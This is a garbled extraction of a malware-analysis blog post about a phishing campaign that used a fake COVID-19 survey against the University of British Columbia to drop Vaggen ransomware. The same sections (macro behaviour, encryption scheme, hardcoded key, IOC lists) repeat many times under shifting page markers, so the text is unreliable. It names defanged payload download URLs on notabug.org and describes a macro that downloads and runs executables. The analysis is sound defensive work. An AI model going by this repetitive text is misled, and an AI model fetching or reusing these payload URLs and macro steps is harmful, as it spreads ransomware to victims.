function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 31 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 32 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 33 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 34 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 35 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 36 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 37 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 38 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 39 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 40 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 41 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 42 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 43 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 44 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 45 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 46 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 47 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 48 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 49 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 50 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 51 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 52 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 53 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 54 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 55 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 56 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 57 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 58 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 59 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 60 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 61 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 62 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 63 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 64 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 65 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 66 of 